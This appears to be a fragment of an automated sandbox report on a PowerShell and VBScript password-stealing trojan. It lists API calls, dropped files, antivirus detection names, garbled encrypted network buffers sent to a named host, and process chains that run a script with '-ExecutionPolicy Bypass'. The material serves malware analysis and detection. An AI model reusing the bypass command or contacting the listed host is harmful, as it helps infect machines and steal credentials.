filepath_r: powershell
parameters: -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
file C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
file C:\ProgramData\Document\sChildKey.vbs
DrWeb VBS.DownLoader.2305
Sangfor Trojan.Generic-PS.Save.721ff762
Arcabit Trojan.PWS.Agent.SVN
ESET-NOD32 PowerShell/Agent.YT
Cynet Malicious (score: 99)
BitDefender Trojan.PWS.Agent.SVN
MicroWorld-eScan Trojan.PWS.Agent.SVN
Emsisoft Trojan.PWS.Agent.SVN (B)
F-Secure Trojan.TR/PShell.Dldr.G2
VIPRE Trojan.PWS.Agent.SVN
FireEye Trojan.PWS.Agent.SVN
Ikarus Trojan.PowerShell.Agent
Avira TR/PShell.Dldr.G2
GData Trojan.PWS.Agent.SVN
ALYac Trojan.PWS.Agent.SVN
MAX malware (ai score=80)
Time & API Arguments Status Return Repeated

send

buffer: yud÷̲ýÀ…ƬòMË®—‚;u ŽÃ™Ú‘u+šJ/5 ÀÀÀ À 284ÿwww.kbproducciones.com  
socket: 1420
sent: 126
1 126 0

send

buffer:  OU&g'YEA@)ñӇ©bþÁäە‚®ûôÊh ]ÎèH³|Súù½g܏$c@ƒØV|ÝÝÏFâvµ£<3bÛ¦íb"BÏg*·Æõn®ç7Ãm`½øÿW·ÄŒ b㠉.,=´‹»¡²Ÿà›óûç¹tÈßh½~Å?½AwÛ¨™9¶¹WŸœ"ø>z¾])¶RÜGa¹‹æ)p¤×ñ×Ü£õĉÆá_h¦ Фr&„Z?ýÌDï󈽊çà¦"Ù?ì¹a>Yܯt©À@uT‚Xù¬(Â)#µÃ^ºh›J$ÅRH…Œ!f0Ð%Æ°•ÇŸ!¹;°î}\l(2IÀ8ˆ©¾»¸ÑÆFˆc¾,.Í;rL\FÑB$æè»F
socket: 1420
sent: 326
1 326 0
parent_process powershell.exe martian_process "C:\Windows\System32\WScript.exe" "C:\ProgramData\Document\sChildKey.vbs"
parent_process powershell.exe martian_process C:\ProgramData\Document\sChildKey.vbs
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe